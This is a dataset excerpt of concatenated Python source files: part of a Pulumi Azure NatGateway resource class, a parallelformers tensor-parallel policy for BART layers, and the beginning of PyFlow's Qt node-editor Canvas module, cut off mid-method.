        __props__.__dict__["type"] = None
    # Aliases map older/parallel type tokens of this resource to this one.
    alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20200701:NatGateway"), pulumi.Alias(type_="azure-native:network:NatGateway"), pulumi.Alias(type_="azure-nextgen:network:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190201:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190201:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190401:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190401:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190601:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190601:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190701:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190701:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190801:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190801:NatGateway"), pulumi.Alias(type_="azure-native:network/v20190901:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20190901:NatGateway"), pulumi.Alias(type_="azure-native:network/v20191101:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20191101:NatGateway"), pulumi.Alias(type_="azure-native:network/v20191201:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20191201:NatGateway"), pulumi.Alias(type_="azure-native:network/v20200301:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200301:NatGateway"), pulumi.Alias(type_="azure-native:network/v20200401:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200401:NatGateway"), pulumi.Alias(type_="azure-native:network/v20200501:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200501:NatGateway"), pulumi.Alias(type_="azure-native:network/v20200601:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200601:NatGateway"), pulumi.Alias(type_="azure-native:network/v20200801:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20200801:NatGateway"), pulumi.Alias(type_="azure-native:network/v20201101:NatGateway"), pulumi.Alias(type_="azure-nextgen:network/v20201101:NatGateway")])
    opts = pulumi.ResourceOptions.merge(opts, alias_opts)
    super(NatGateway, __self__).__init__(
        'azure-native:network/v20200701:NatGateway',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None) -> 'NatGateway':
    """
    Get an existing NatGateway resource's state with the given name, id, and optional extra
    properties used to qualify the lookup.

    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

    # All properties start as None; the engine populates them from the
    # existing resource identified by ``id``.
    __props__ = NatGatewayArgs.__new__(NatGatewayArgs)

    __props__.__dict__["etag"] = None
    __props__.__dict__["idle_timeout_in_minutes"] = None
    __props__.__dict__["location"] = None
    __props__.__dict__["name"] = None
    __props__.__dict__["provisioning_state"] = None
    __props__.__dict__["public_ip_addresses"] = None
    __props__.__dict__["public_ip_prefixes"] = None
    __props__.__dict__["resource_guid"] = None
    __props__.__dict__["sku"] = None
    __props__.__dict__["subnets"] = None
    __props__.__dict__["tags"] = None
    __props__.__dict__["type"] = None
    __props__.__dict__["zones"] = None
    return NatGateway(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def etag(self) -> pulumi.Output[str]:
        """
        A unique read-only string that changes whenever the resource is updated.
        """
        # Engine-resolved output; useful as an optimistic-concurrency token.
        return pulumi.get(self, "etag")
    @property
    @pulumi.getter(name="idleTimeoutInMinutes")
    def idle_timeout_in_minutes(self) -> pulumi.Output[Optional[int]]:
        """
        The idle timeout of the nat gateway.
        """
        # Optional output: None when the gateway uses the service default.
        return pulumi.get(self, "idle_timeout_in_minutes")
    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[Optional[str]]:
        """
        Resource location.
        """
        # Azure region name; optional in the underlying API.
        return pulumi.get(self, "location")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Resource name.
        """
        # Read-only output populated by the provider.
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> pulumi.Output[str]:
        """
        The provisioning state of the NAT gateway resource.
        """
        # Read-only lifecycle status reported by Azure.
        return pulumi.get(self, "provisioning_state")
    @property
    @pulumi.getter(name="publicIpAddresses")
    def public_ip_addresses(self) -> pulumi.Output[Optional[Sequence['outputs.SubResourceResponse']]]:
        """
        An array of public ip addresses associated with the nat gateway resource.
        """
        # Sub-resource references (IDs), not full public IP objects.
        return pulumi.get(self, "public_ip_addresses")
    @property
    @pulumi.getter(name="publicIpPrefixes")
    def public_ip_prefixes(self) -> pulumi.Output[Optional[Sequence['outputs.SubResourceResponse']]]:
        """
        An array of public ip prefixes associated with the nat gateway resource.
        """
        # Sub-resource references (IDs) to public IP prefix resources.
        return pulumi.get(self, "public_ip_prefixes")
    @property
    @pulumi.getter(name="resourceGuid")
    def resource_guid(self) -> pulumi.Output[str]:
        """
        The resource GUID property of the NAT gateway resource.
        """
        # Stable identifier assigned by Azure, distinct from the resource ID.
        return pulumi.get(self, "resource_guid")
    @property
    @pulumi.getter
    def sku(self) -> pulumi.Output[Optional['outputs.NatGatewaySkuResponse']]:
        """
        The nat gateway SKU.
        """
        # Optional: None when no SKU block was supplied at creation.
        return pulumi.get(self, "sku")
    @property
    @pulumi.getter
    def subnets(self) -> pulumi.Output[Sequence['outputs.SubResourceResponse']]:
        """
        An array of references to the subnets using this nat gateway resource.
        """
        # Read-only back-references populated by Azure.
        return pulumi.get(self, "subnets")
    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        Resource tags.
        """
        # Free-form key/value metadata; optional.
        return pulumi.get(self, "tags")
    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        Resource type.
        """
        # Name shadows the builtin, but it is part of the public SDK surface.
        return pulumi.get(self, "type")
    @property
    @pulumi.getter
    def zones(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        A list of availability zones denoting the zone in which Nat Gateway should be deployed.
        """
        # Optional list of zone names (e.g. "1"); None when non-zonal.
        return pulumi.get(self, "zones")
| 47.052133 | 2,064 | 0.660707 |
acdfb2c9ada8a2dfdd6d9d881957b8e34131bb65 | 4,849 | py | Python | parallelformers/policies/bart.py | Oaklight/parallelformers | 57fc36f81734c29aaf814e092ce13681d3c28ede | [
"Apache-2.0"
] | 454 | 2021-07-18T02:51:23.000Z | 2022-03-31T04:00:53.000Z | parallelformers/policies/bart.py | Oaklight/parallelformers | 57fc36f81734c29aaf814e092ce13681d3c28ede | [
"Apache-2.0"
] | 16 | 2021-07-18T10:47:21.000Z | 2022-03-22T18:49:57.000Z | parallelformers/policies/bart.py | Oaklight/parallelformers | 57fc36f81734c29aaf814e092ce13681d3c28ede | [
"Apache-2.0"
] | 33 | 2021-07-18T04:48:28.000Z | 2022-03-14T22:16:36.000Z | # Copyright 2021 TUNiB inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from transformers.models.bart.modeling_bart import (
BartDecoderLayer,
BartEncoderLayer,
)
from parallelformers.policies.base import Layer, Policy
from parallelformers.transformers.modeling_bart import BartAttention_
from parallelformers.utils.dist_utils import AllReduceLinear
class BartEncoderPolicy(Policy):
    """Tensor-parallel slicing policy for BART encoder layers.

    Describes which attention/MLP weights of a ``BartEncoderLayer`` are
    column/row sliced across devices and which modules get replaced by
    their parallel-aware counterparts.
    """
    @staticmethod
    def replace_arguments(config, world_size):
        # Per-device attention width: both the hidden size and the head
        # count are divided evenly across the tensor-parallel group.
        return {
            "self_attn.embed_dim": config.d_model // world_size,
            "self_attn.num_heads": config.encoder_attention_heads // world_size,
        }
    @staticmethod
    def replace_modules():
        # Swap in the parallelism-aware attention implementation.
        return {"BartAttention": BartAttention_}
    @staticmethod
    def attn_qkv():
        # Query/key/value projections, sliced per device.
        return [
            Layer(weight="self_attn.%s_proj.weight" % proj,
                  bias="self_attn.%s_proj.bias" % proj)
            for proj in ("q", "k", "v")
        ]
    @staticmethod
    def attn_out():
        # Output projection gathers partial results via all-reduce.
        return [
            Layer(weight="self_attn.out_proj.weight",
                  bias="self_attn.out_proj.bias",
                  replace=AllReduceLinear),
        ]
    @staticmethod
    def mlp_in():
        return [Layer(weight="fc1.weight", bias="fc1.bias")]
    @staticmethod
    def mlp_out():
        # Second MLP projection also needs an all-reduce to combine shards.
        return [Layer(weight="fc2.weight", bias="fc2.bias", replace=AllReduceLinear)]
    @staticmethod
    def original_layer_class():
        return BartEncoderLayer
class BartDecoderPolicy(Policy):
    """Tensor-parallel slicing policy for BART decoder layers.

    Same idea as the encoder policy, but a decoder layer carries two
    attention blocks (``self_attn`` and cross-attention ``encoder_attn``),
    so every attention entry is emitted for both.
    """
    @staticmethod
    def replace_arguments(config, world_size):
        sliced_dim = config.d_model // world_size
        sliced_heads = config.decoder_attention_heads // world_size
        return {
            "self_attn.embed_dim": sliced_dim,
            "encoder_attn.embed_dim": sliced_dim,
            "self_attn.num_heads": sliced_heads,
            "encoder_attn.num_heads": sliced_heads,
        }
    @staticmethod
    def replace_modules():
        return {"BartAttention": BartAttention_}
    @staticmethod
    def attn_qkv():
        # q/k/v projections for self-attention first, then cross-attention
        # (same order as the hand-written list this replaces).
        return [
            Layer(weight="%s.%s_proj.weight" % (attn, proj),
                  bias="%s.%s_proj.bias" % (attn, proj))
            for attn in ("self_attn", "encoder_attn")
            for proj in ("q", "k", "v")
        ]
    @staticmethod
    def attn_out():
        # Both output projections gather partial results via all-reduce.
        return [
            Layer(weight="%s.out_proj.weight" % attn,
                  bias="%s.out_proj.bias" % attn,
                  replace=AllReduceLinear)
            for attn in ("self_attn", "encoder_attn")
        ]
    @staticmethod
    def mlp_in():
        return [Layer(weight="fc1.weight", bias="fc1.bias")]
    @staticmethod
    def mlp_out():
        return [Layer(weight="fc2.weight", bias="fc2.bias", replace=AllReduceLinear)]
    @staticmethod
    def original_layer_class():
        return BartDecoderLayer
| 27.551136 | 83 | 0.539286 |
acdfb2ff898730e0ae32a2298681ae95d1bb6743 | 97,245 | py | Python | PyFlow/UI/Canvas/Canvas.py | liaokongVFX/PyFlow | 337462746acf087432f4dd3248e3a1349c3a3c79 | [
"Apache-2.0"
] | null | null | null | PyFlow/UI/Canvas/Canvas.py | liaokongVFX/PyFlow | 337462746acf087432f4dd3248e3a1349c3a3c79 | [
"Apache-2.0"
] | null | null | null | PyFlow/UI/Canvas/Canvas.py | liaokongVFX/PyFlow | 337462746acf087432f4dd3248e3a1349c3a3c79 | [
"Apache-2.0"
] | 1 | 2019-08-21T07:36:20.000Z | 2019-08-21T07:36:20.000Z | ## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from nine import str
import random
from copy import deepcopy
import json
import uuid
import weakref
from collections import Counter
from functools import partial
try:
from inspect import getfullargspec as getargspec
except:
from inspect import getargspec
from Qt import QtCore
from Qt import QtGui
from Qt import QtWidgets
from Qt.QtWidgets import *
from PyFlow.UI.EditorHistory import EditorHistory
from PyFlow.UI.Utils.stylesheet import Colors
from PyFlow.UI.Canvas.UICommon import *
from PyFlow.UI.Canvas.SelectionRect import SelectionRect
from PyFlow.UI.Canvas.UIConnection import UIConnection
from PyFlow.UI.Canvas.UINodeBase import UINodeBase
from PyFlow.UI.Canvas.UINodeBase import getUINodeInstance
from PyFlow.UI.Canvas.UINodeBase import NodeActionButtonBase
from PyFlow.UI.Canvas.UIPinBase import UIPinBase, PinGroup
from PyFlow.UI.Views.NodeBox import NodesBox
from PyFlow.UI.Canvas.AutoPanController import AutoPanController
from PyFlow.UI.UIInterfaces import IPropertiesViewSupport
from PyFlow.Core.PinBase import PinBase
from PyFlow.Core.NodeBase import NodeBase
from PyFlow.Input import InputManager, InputAction, InputActionType
from PyFlow.UI.Views.VariablesWidget import (
VARIABLE_TAG,
VARIABLE_DATA_TAG
)
from PyFlow import getRawNodeInstance
from PyFlow.Core.Common import *
from PyFlow.Packages.PyFlowBase.Nodes.commentNode import commentNode
from PyFlow.Packages.PyFlowBase.UI.UIRerouteNode import UIRerouteNode
from PyFlow.Packages.PyFlowBase.UI.UIRerouteNodeSmall import UIRerouteNodeSmall
from PyFlow.Packages.PyFlowBase import PACKAGE_NAME as PYFLOW_BASE_PACKAGE_NAME
from PyFlow.UI.Utils.stylesheet import editableStyleSheet
def getNodeInstance(jsonTemplate, canvas, parentGraph=None):
    """Construct a UI node from a serialized node template and add it to *canvas*.

    :param jsonTemplate: dict produced by :meth:`NodeBase.jsonTemplate` with at
        least ``type``, ``name``, ``package``, ``uuid`` and optionally ``lib``
        and (for getVar/setVar) ``varUid``.
    :param canvas: the :class:`Canvas` the new UI node is added to.
    :param parentGraph: optional raw graph that should own the node.
    :returns: the created UI node wrapper.
    :raises AssertionError: if the node type cannot be found or the created
        node belongs to an unexpected package.
    """
    nodeClassName = jsonTemplate['type']
    packageName = jsonTemplate['package']
    # Older templates may not carry a 'lib' key; .get() covers both cases.
    libName = jsonTemplate.get('lib')
    kwargs = {}
    # getVar/setVar nodes need a reference to the variable they bind to.
    if jsonTemplate['type'] in ('getVar', 'setVar'):
        kwargs['var'] = canvas.graphManager.findVariableByUid(uuid.UUID(jsonTemplate['varUid']))
    raw_instance = getRawNodeInstance(nodeClassName, packageName=packageName, libName=libName, **kwargs)
    # Check for None BEFORE touching attributes: the original dereferenced
    # raw_instance.packageName first, turning a missing node type into an
    # AttributeError instead of this informative assertion.
    assert raw_instance is not None, "Node {0} not found in package {1}".format(nodeClassName, packageName)
    assert raw_instance.packageName == packageName
    raw_instance.uid = uuid.UUID(jsonTemplate['uuid'])
    instance = getUINodeInstance(raw_instance)
    canvas.addNode(instance, jsonTemplate, parentGraph=parentGraph)
    return instance
class SceneClass(QGraphicsScene):
    """Graphics scene backing the node canvas.

    Owns the drag-and-drop workflow used by the node box and the variables
    widget: while a node description is dragged over the scene a temporary
    ("ghost") node follows the cursor and wires under it are highlighted so
    the drop can splice the new node into an existing connection.
    """
    def __init__(self, parent):
        super(SceneClass, self).__init__(parent)
        self.setItemIndexMethod(self.NoIndex)
        # self.pressed_port = None
        self.selectionChanged.connect(self.OnSelectionChanged)
        # Temporary ghost node shown while a drag is in progress.
        self.tempnode = None
        # Connections currently highlighted under the dragged ghost node.
        self.hoverItems = []
    def shoutDown(self):
        # Disconnect before teardown so late selection callbacks cannot fire
        # on a half-destroyed scene.
        self.selectionChanged.disconnect()
    def mousePressEvent(self, event):
        # do not clear selection when panning
        modifiers = event.modifiers()
        # or modifiers == QtCore.Qt.ShiftModifier:
        if event.button() == QtCore.Qt.RightButton:
            event.accept()
            return
        QGraphicsScene.mousePressEvent(self, event)
    def dragEnterEvent(self, event):
        # Accept node-description drags (plain-text JSON) and spawn a ghost
        # node. Variable drags are deferred entirely to dropEvent.
        if event.mimeData().hasFormat('text/plain'):
            event.accept()
            mime = str(event.mimeData().text())
            jsonData = json.loads(mime)
            if VARIABLE_TAG in jsonData:
                return
            packageName = jsonData["package"]
            nodeType = jsonData["type"]
            libName = jsonData["lib"]
            name = nodeType
            nodeTemplate = NodeBase.jsonTemplate()
            nodeTemplate['package'] = packageName
            nodeTemplate['lib'] = libName
            nodeTemplate['type'] = nodeType
            nodeTemplate['name'] = name
            nodeTemplate['x'] = event.scenePos().x()
            nodeTemplate['y'] = event.scenePos().y()
            nodeTemplate['meta']['label'] = nodeType
            nodeTemplate['uuid'] = str(uuid.uuid4())
            # Discard any stale ghost node left over from a previous drag.
            try:
                self.tempnode.isTemp = False
                self.tempnode = None
            except Exception as e:
                pass
            self.tempnode = self.parent()._createNode(nodeTemplate)
            if self.tempnode:
                self.tempnode.isTemp = True
            self.hoverItems = []
        else:
            event.ignore()
    def dragMoveEvent(self, event):
        # Move the ghost node with the cursor and thicken any wire it could
        # be spliced into (a wire whose endpoints are pin-compatible with
        # the ghost node's inputs/outputs).
        if event.mimeData().hasFormat('text/plain'):
            event.setDropAction(QtCore.Qt.MoveAction)
            event.accept()
            if self.tempnode:
                # Keep the ghost node horizontally centered on the cursor.
                self.tempnode.setPos(
                    (self.tempnode.w / -2) + event.scenePos().x(), event.scenePos().y())
                # Probe a 3x3 px area around the cursor for items.
                mouseRect = QtCore.QRect(QtCore.QPoint(event.scenePos().x() - 1, event.scenePos().y() - 1),
                                         QtCore.QPoint(event.scenePos().x() + 1, event.scenePos().y() + 1))
                hoverItems = self.items(mouseRect)
                for item in hoverItems:
                    if isinstance(item, UIConnection):
                        valid = False
                        for inp in self.tempnode.UIinputs.values():
                            if canConnectPins(item.source()._rawPin, inp._rawPin):
                                valid = True
                        for out in self.tempnode.UIoutputs.values():
                            if canConnectPins(out._rawPin, item.destination()._rawPin):
                                valid = True
                        if valid:
                            self.hoverItems.append(item)
                            item.drawThick()
                # Restore wires the cursor moved away from.
                # NOTE(review): this removes from self.hoverItems while
                # iterating it, which can skip entries — confirm intent.
                for item in self.hoverItems:
                    if item not in hoverItems:
                        self.hoverItems.remove(item)
                        if isinstance(item, UIConnection):
                            item.restoreThick()
                    else:
                        if isinstance(item, UIConnection):
                            item.drawThick()
        else:
            event.ignore()
    def dragLeaveEvent(self, event):
        # Drag cancelled: destroy the ghost node.
        if self.tempnode:
            self.tempnode._rawNode.kill()
            self.tempnode = None
        event.accept()
    def OnSelectionChanged(self):
        # Hook kept for future use; selection bookkeeping happens elsewhere.
        pass
    def createVariableGetter(self):
        # Placeholder; variable getter creation is handled in dropEvent.
        pass
    def dropEvent(self, event):
        """Finish a drag: create getter/setter nodes for variable drops, or
        materialize the ghost node and auto-connect it to the pin/wire it
        was dropped onto."""
        x = event.scenePos().x()
        y = event.scenePos().y()
        if event.mimeData().hasFormat('text/plain'):
            jsonData = json.loads(event.mimeData().text())
            # try load mime data text as json
            # in case if it is a variable
            # if no keyboard modifires create context menu with two actions
            # for creating getter or setter
            # if control - create getter, if alt - create setter
            if VARIABLE_TAG in jsonData:
                modifiers = event.modifiers()
                varData = jsonData[VARIABLE_DATA_TAG]
                nodeTemplate = NodeBase.jsonTemplate()
                nodeTemplate['name'] = varData['name']
                nodeTemplate['x'] = x
                nodeTemplate['y'] = y
                nodeTemplate['package'] = PYFLOW_BASE_PACKAGE_NAME
                if modifiers == QtCore.Qt.NoModifier:
                    nodeTemplate['type'] = 'getVar'
                    nodeTemplate['meta']['label'] = varData['name']
                    # node uid should be unique, different from var
                    nodeTemplate['uuid'] = str(uuid.uuid4())
                    nodeTemplate['varUid'] = varData['uuid']
                    m = QMenu()
                    getterAction = m.addAction('Get')
                    def varGetterCreator():
                        n = self.parent().createNode(nodeTemplate)
                        n.updateNodeShape()
                    getterAction.triggered.connect(varGetterCreator)
                    setNodeTemplate = dict(nodeTemplate)
                    setterAction = m.addAction('Set')
                    setNodeTemplate['type'] = 'setVar'
                    setterAction.triggered.connect(lambda: self.parent().createNode(setNodeTemplate))
                    m.exec_(QtGui.QCursor.pos(), None)
                if modifiers == QtCore.Qt.ControlModifier:
                    nodeTemplate['type'] = 'getVar'
                    # node uid should be unique, different from var
                    nodeTemplate['uuid'] = str(uuid.uuid4())
                    nodeTemplate['varUid'] = varData['uuid']
                    nodeTemplate['meta']['label'] = varData['name']
                    self.parent().createNode(nodeTemplate)
                    return
                if modifiers == QtCore.Qt.AltModifier:
                    nodeTemplate['type'] = 'setVar'
                    nodeTemplate['uuid'] = str(uuid.uuid4())
                    nodeTemplate['varUid'] = varData['uuid']
                    nodeTemplate['meta']['label'] = varData['name']
                    self.parent().createNode(nodeTemplate)
                    return
            else:
                packageName = jsonData["package"]
                nodeType = jsonData["type"]
                libName = jsonData['lib']
                name = nodeType
                dropItem = self.parent().nodeFromInstance(self.itemAt(event.scenePos(), QtGui.QTransform()))
                if not dropItem or (isinstance(dropItem, UINodeBase) and dropItem.isCommentNode or dropItem.isTemp) or isinstance(dropItem, UIPinBase) or isinstance(dropItem, UIConnection):
                    nodeTemplate = NodeBase.jsonTemplate()
                    nodeTemplate['package'] = packageName
                    nodeTemplate['lib'] = libName
                    nodeTemplate['type'] = nodeType
                    nodeTemplate['name'] = name
                    nodeTemplate['x'] = x
                    nodeTemplate['y'] = y
                    nodeTemplate['meta']['label'] = nodeType
                    nodeTemplate['uuid'] = str(uuid.uuid4())
                    if self.tempnode:
                        # Promote the ghost node into a real node.
                        self.tempnode.updateOwningCommentNode()
                        self.tempnode.isTemp = False
                        self.tempnode.update()
                        node = self.tempnode
                        self.tempnode = None
                        for it in self.items(event.scenePos()):
                            if isinstance(it, UIPinBase):
                                dropItem = it
                                break
                            elif isinstance(it, UIConnection):
                                dropItem = it
                                break
                        EditorHistory().saveState("Create node {}".format(node.name), modify=True)
                    else:
                        node = self.parent().createNode(nodeTemplate)
                    nodeInputs = node.namePinInputsMap
                    nodeOutputs = node.namePinOutputsMap
                    if isinstance(dropItem, UIPinBase):
                        # Dropped on a pin: connect the first compatible pin,
                        # offsetting the node to the proper side of it.
                        node.setPos(x - node.boundingRect().width(), y)
                        for inp in nodeInputs.values():
                            if canConnectPins(dropItem._rawPin, inp._rawPin):
                                if dropItem.isExec():
                                    dropItem._rawPin.disconnectAll()
                                self.parent().connectPins(dropItem, inp)
                                node.setPos(x + node.boundingRect().width(), y)
                                break
                        for out in nodeOutputs.values():
                            if canConnectPins(out._rawPin, dropItem._rawPin):
                                self.parent().connectPins(out, dropItem)
                                node.setPos(x - node.boundingRect().width(), y)
                                break
                    if isinstance(dropItem, UIConnection):
                        # Dropped on a wire: splice the node into it.
                        for inp in nodeInputs.values():
                            if canConnectPins(dropItem.source()._rawPin, inp._rawPin):
                                if dropItem.source().isExec():
                                    dropItem.source()._rawPin.disconnectAll()
                                self.parent().connectPins(dropItem.source(), inp)
                                break
                        for out in nodeOutputs.values():
                            if canConnectPins(out._rawPin, dropItem.destination()._rawPin):
                                self.parent().connectPins(out, dropItem.destination())
                                break
        else:
            super(SceneClass, self).dropEvent(event)
class Canvas(QGraphicsView):
    """UI canvas class
    """
    # Current interaction mode; see CanvasManipulationMode.
    _manipulationMode = CanvasManipulationMode.NONE
    # Pen colors for the interactive wire preview drawn while connecting pins.
    _realTimeLineInvalidPen = Colors.Red
    _realTimeLineNormalPen = Colors.White
    _realTimeLineValidPen = Colors.Green
    # Zoom factor applied per mouse-wheel delta unit.
    _mouseWheelZoomRate = 0.0005
    # Emitted to (re)populate / clear the properties panel.
    requestFillProperties = QtCore.Signal(object)
    requestClearProperties = QtCore.Signal()
    # argument is a list of ui nodes
    requestShowSearchResults = QtCore.Signal(object)
    # When True, an event filter is installed in __init__ (tab handling).
    USETAB = True
    def __init__(self, graphManager, pyFlowInstance=None):
        """
        :param graphManager: graph manager driving this view; its
            graphChanged signal switches what the canvas displays.
        :param pyFlowInstance: owning PyFlow app widget; its signals are
            wired here (must not be None — newFileExecuted is connected).
        """
        super(Canvas, self).__init__()
        self.setFocusPolicy(QtCore.Qt.StrongFocus)
        self.menu = QMenu()
        self.populateMenu()
        self.state = CanvasState.DEFAULT
        self.graphManager = graphManager
        self.graphManager.graphChanged.connect(self.onGraphChanged)
        self.pyFlowInstance = pyFlowInstance
        # connect with App class signals
        self.pyFlowInstance.newFileExecuted.connect(self.onNewFile)
        self.setScene(SceneClass(self))
        self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        # Mouse interaction bookkeeping.
        self.pressed_item = None
        self.pressedPin = None
        self.released_item = None
        self.resizing = False
        self.hoverItems = []
        self.hoveredRerutes = []
        self.bPanMode = False
        self._isPanning = False
        self._mousePressed = False
        self._shadows = False
        self._panSpeed = 1.0
        # Zoom clamp range.
        self._minimum_scale = 0.2
        self._maximum_scale = 3.0
        self.setViewportUpdateMode(QGraphicsView.FullViewportUpdate)
        self.setTransformationAnchor(QGraphicsView.AnchorUnderMouse)
        # Antialias -- Change to Settings
        self.setRenderHint(QtGui.QPainter.Antialiasing)
        self.setRenderHint(QtGui.QPainter.TextAntialiasing)
        ##
        self.setAcceptDrops(True)
        self.setAttribute(QtCore.Qt.WA_AlwaysShowToolTips)
        self.setResizeAnchor(QGraphicsView.AnchorUnderMouse)
        self.scene().setSceneRect(QtCore.QRectF(0, 0, 10, 10))
        self.factor = 1
        # Preview wire drawn while the user drags from a pin.
        self.realTimeLine = QGraphicsPathItem(None, self.scene())
        self.realTimeLine.name = 'RealTimeLine'
        self.realTimeLineInvalidPen = QtGui.QPen(self._realTimeLineInvalidPen, 2.0, QtCore.Qt.SolidLine)
        self.realTimeLineNormalPen = QtGui.QPen(self._realTimeLineNormalPen, 2.0, QtCore.Qt.DashLine)
        self.realTimeLineValidPen = QtGui.QPen(self._realTimeLineValidPen, 2.0, QtCore.Qt.SolidLine)
        self.realTimeLine.setPen(self.realTimeLineNormalPen)
        self.mousePressPose = QtCore.QPointF(0, 0)
        self.mousePos = QtCore.QPointF(0, 0)
        self._lastMousePos = QtCore.QPointF(0, 0)
        self._right_button = False
        self._drawRealtimeLine = False
        self._update_items = False
        self._resize_group_mode = False
        self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
        self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
        self.centerOn(QtCore.QPointF(self.sceneRect().width() /
                                     2, self.sceneRect().height() / 2))
        self.initialScrollBarsPos = QtGui.QVector2D(
            self.horizontalScrollBar().value(), self.verticalScrollBar().value())
        self._sortcuts_enabled = True
        self.current_rounded_pos = QtCore.QPointF(0.0, 0.0)
        self.autoPanController = AutoPanController()
        self._bRightBeforeShoutDown = False
        # Node search popup (frameless, drag-and-drop capable).
        self.node_box = NodesBox(self.getApp(), self, bUseDragAndDrop=True)
        self.node_box.setWindowFlags(QtCore.Qt.Window | QtCore.Qt.FramelessWindowHint)
        self.codeEditors = {}
        # {uuid: UIConnection} for wires drawn on this canvas.
        self._UIConnections = {}
        self.boundingRect = self.rect()
        if self.USETAB:
            self.installEventFilter(self)
        self.reconnectingWires = set()
        self.currentPressedKey = None
        self.dropCallback = None
    def getApp(self):
        # The owning PyFlow application instance.
        return self.pyFlowInstance
    def onGraphChanged(self, newGraph):
        """Show only items belonging to *newGraph* and revalidate ownership.

        Connected to graphManager.graphChanged; runs every time the active
        (sub)graph switches.
        """
        for node in self.nodes.values():
            bVisible = node._rawNode.graph() == newGraph
            node.setVisible(bVisible)
            for pin in node.UIPins.values():
                for connection in pin.uiConnectionList:
                    if bVisible:
                        # Wires stay hidden while their comment node is collapsed.
                        if not connection.isUnderCollapsedComment():
                            connection.setVisible(bVisible)
                    else:
                        connection.setVisible(bVisible)
        self.validateCommentNodesOwnership(newGraph)
        # Re-apply collapsed comment state so owned nodes are hidden again.
        for commentNode in newGraph.getNodesList():
            uiCommentNode = commentNode.getWrapper()
            if uiCommentNode.isCommentNode:
                if uiCommentNode.collapsed:
                    uiCommentNode.hideOwningNodes()
        self.validateConnections(newGraph)
        def nodeShapeUpdater():
            for node in self.nodes.values():
                node.updateNodeShape()
        # Deferred shape refresh — presumably to let the view settle after
        # the visibility changes above; confirm before changing the delay.
        QtCore.QTimer.singleShot(100, nodeShapeUpdater)
def jumpToNode(self, uiNode):
self.graphManager.selectGraph(uiNode.graph())
self.clearSelection()
uiNode.setSelected(True)
self.frameSelectedNodes()
    @property
    def manipulationMode(self):
        # Current interaction mode (see CanvasManipulationMode); the setter
        # also updates the viewport cursor.
        return self._manipulationMode
@manipulationMode.setter
def manipulationMode(self, value):
self._manipulationMode = value
if value == CanvasManipulationMode.NONE:
pass
elif value == CanvasManipulationMode.SELECT:
self.viewport().setCursor(QtCore.Qt.ArrowCursor)
elif value == CanvasManipulationMode.PAN:
self.viewport().setCursor(QtCore.Qt.OpenHandCursor)
elif value == CanvasManipulationMode.MOVE:
self.viewport().setCursor(QtCore.Qt.ArrowCursor)
elif value == CanvasManipulationMode.ZOOM:
self.viewport().setCursor(QtCore.Qt.SizeHorCursor)
elif value == CanvasManipulationMode.COPY:
self.viewport().setCursor(QtCore.Qt.ArrowCursor)
def setSelectedNodesCollapsed(self, collapsed=True):
for node in self.selectedNodes():
node.collapsed = collapsed
    def collapseSelectedNodesToCompound(self):
        """Replace the selected nodes with a single compound node.

        The selection is copied into a new compound subgraph; boundary wires
        are recreated through graphInputs/graphOutputs nodes inside the
        compound, and the compound's exposed pins are reconnected to the
        outside world on a deferred timer tick.
        """
        selectedNodes = self.selectedNodes()
        if len(selectedNodes) == 0:
            return
        selectedNodesRect = self.getNodesRect(True, True)
        # Gather every wire touching the selection.
        wires = list()
        for node in selectedNodes:
            for pin in node.UIPins.values():
                wires.extend(pin.uiConnectionList)
        # Boundary pins (outside the selection) and, per pin, the list of
        # [nodeName, pinName] endpoints inside the selection they connect to.
        inputPins = list()
        inputConectionList = dict()
        outputPins = list()
        outputConectionList = dict()
        for wire in wires:
